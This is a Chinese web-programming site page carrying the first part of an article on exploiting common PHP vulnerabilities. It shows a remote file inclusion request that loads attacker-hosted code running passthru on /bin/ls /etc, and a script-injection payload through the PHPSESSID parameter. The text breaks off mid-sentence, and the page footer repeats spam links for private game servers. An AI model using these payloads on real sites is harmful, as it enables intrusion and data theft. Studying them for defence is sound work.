电脑设备 - 网络编程 文章类 软件类
好好999
 | 网站首页 | 网络编程语言 | 星座情感文章 | 特殊软件下载 | 站长工具天下 | 
百度热门搜索: kappa女员工  网络成瘾诊断标准  2009无线节目巡礼  央视女主播柴璐  东楼kappa女 08万千星辉颁奖典礼 刘雯雯 芙蓉姐姐自杀 更多...
您现在的位置: 学习网 > 网络编程语言 > Php > 正文
 | 网络编程语言首页 | Dreamweaver | Html | Asp | Jsp | Php | Asp.net | Css | Javascript | Access | Mysql | Mssql | Oracle | Domain | Mainframe |
最 新 热 门
普通文章PHP中多张图片上传并校验的实现
普通文章做个站内搜索引擎
普通文章PHP实例:实现给上传图片加水印图案
普通文章用PHP和ACCESS写聊天室(一
普通文章PHP 字符串操作入门教程
普通文章用PHP写的SMTP类,支持附件(多个)
普通文章说说PHP作图
普通文章2
普通文章中文注释的php.ini ( darkwings翻译
普通文章仿OfficeXP风格的左边版面列表
 
频 道 推 荐
普通文章一个ftp类(ini.php)
普通文章在PHP3中实现SESSION的功能(二、C
普通文章目录遍历函数
普通文章正规表达式函数
普通文章WINDOWS服务器安装多套PHP
普通文章PHP脚本的10个技巧(8)
普通文章phpmyadmin连接mysql的问题
普通文章php用流方式制作缩略图
普通文章PHP安装攻略:PHP PERL(四)
普通文章Zend公司全球首推PHP认证
普通文章php和js交互一例
普通文章利用php和js实现页面数据刷新
普通文章如何使用PHP中的日期和时间函数
普通文章Apache 实现禁止图片盗链
普通文章PHP 在Windows 2003 Enterprise Se
普通文章php生成WAP页面的详细讲解
普通文章PHP禁止图片盗链
普通文章PHP.MVC的模板标签系统之模板标签库
普通文章在php中取得image按钮传递的name值
普通文章PHP实现发表文章时自动保存图片
 
频 道 推 广
 
PHP网站漏洞的相关总结           ★★★
PHP网站漏洞的相关总结
作者:佚名 文章来源:本站整理 更新时间:2008-5-25 18:27:21
PHP网站漏洞的相关总结
从现在的网络安全来看,大家最关注和接触最多的WEB页面漏洞应该是ASP了,在这方面,小竹是专家,我没发言权.然而在PHP方面来看,也同样存在很严重的安全问题,但是这方面的文章却不多.在这里,就跟大家来稍微的讨论一下PHP页面的相关漏洞吧.

    我对目前常见的PHP漏洞做了一下总结,大致分为以下几种:包含文件漏洞,脚本命令执行漏洞,文件泄露漏洞,SQL注入漏洞等几种.当然,至于COOKIE欺骗等一部分通用的技术就不在这里讨论了,这些资料网上也很多.那么,我们就一个一个来分析一下怎样利用这些漏洞吧!

    首先,我们来讨论包含文件漏洞.这个漏洞应该说是PHP独有的吧.这是由于不充分处理外部提供的恶意数据,从而导致远程攻击者可以利用这些漏洞以WEB进程权限在系统上执行任意命令.我们来看一个例子:假设在a.php中有这样一句代码:
<?php
include($include."/xxx.php");
?>
在这段代码中,$include一般是一个已经设置好的路径,但是我们可以通过自己构造一个路径来达到攻击的目的.比方说我们提交:a.php?include=http://web/b.php,这个web是我们用做攻击的空间,当然,b.php也就是我们用来攻击的代码了.我们可以在b.php中写入类似于:passthru("/bin/ls /etc");的代码.这样,就可以执行一些有目的的攻击了.(注:web服务器应该不能执行php代码,不然就出问题了.相关详情可以去看<<如何对PHP程序中的常见漏洞进行攻击>>).在这个漏洞方面,出状况的很多,比方说:PayPal Store Front,
HotNews,Mambo Open Source,PhpDig,YABB SE,phpBB,InvisionBoard,SOLMETRA SPAW Editor,Les Visiteurs,PhpGedView,X-Cart等等一些.

    接着,我们再来看一下脚本命令执行漏洞.这是由于对用户提交的URI参数缺少充分过滤,提交包含恶意HTML代码的数据,可导致触发跨站脚本攻击,可能获得目标用户的敏感信息。我们也举个例子:在PHP Transparent的PHP PHP 4.3.1以下版本中的index.php页面对PHPSESSID缺少充分的过滤,我们可以通过这样的代码来达到攻击的目的:
http://web/index.php?PHPSESSID="><script>...</script>在script里面我们可以构造函数来获得用户的一些敏感信息.在这个漏洞方面相对要少一点,除了PHP Transparent之外还有:PHP-Nuke,phpBB,PHP Classifieds,PHPix,Ultimate PHP Board等等.

    再然后,我们就来看看文件泄露漏洞了.这种漏洞是由于对用户提交参数缺少充分过滤,远程攻击者可以利用它进行目录遍历攻击以及获取一些敏感信息。我们拿最近发现的phpMyAdmin来做例子.在phpMyAdmin中,export.php页面没有对用户提交的'wh

[1] [2] [3] [4] 下一页

更多精彩:学习网->http://www.haohao888.com.cn 网络编程->http://www.51wlpc.com 电脑设备->http://www.xpmaster.cn
文章录入:admin    责任编辑:admin 
  • 上一篇文章:

  • 下一篇文章:
  • 相 关 文 章
    数据库综合开发实践
    RDS 对象模型总结
    程序员的生命
    DW属性设置的总结
    SCO UNIX下磁带机的安装与备份
    在主页中加入自己的声音
    DIV CSS制作网页时易犯的错误总结
    学习CSS制作网页总结的一些经验
    CSS网站布局技巧几则总结
    CSS样式表技巧总结
    网页制作知识总结:CSS常用小技巧
    在网页制作学习中总结的CSS的小技巧
    《APMServ 5.1.2》使用图解
    AJaX for weblogs
    总结:ADO.NET在开发中的部分使用方法和技巧(2)
    总结:ADO.NET在开发中的部分使用方法和技巧(1)
    Js 调用 WebService心得总结
    数据库开发个人总结(ADO.NET小结)
    页面之间传递值个人总结
    Web2.0时代,RSS你会用了吗?(技术实现总结)
    | 设为首页 | 加入收藏 | 投搞邮箱 | 友情链接 | 网站公告 | 版权申明 | |
    魔兽世界私服 - 魔兽世界私服 - 魔兽世界私服 - 魔兽世界私服 - 劲舞团私服 - 劲舞团私服 - 劲舞团私服 - 劲舞团私服 - 劲舞团私服 - 劲舞团私服 - 劲舞团私服 - 完美世界私服 - 传奇私服 - 变态传奇私服 - 及时雨外挂 - 热血传奇私服

    有事请点这里

    有事点这里

    copyright: 2007-2008 haohao888.com.cn 粤ICP备08105098号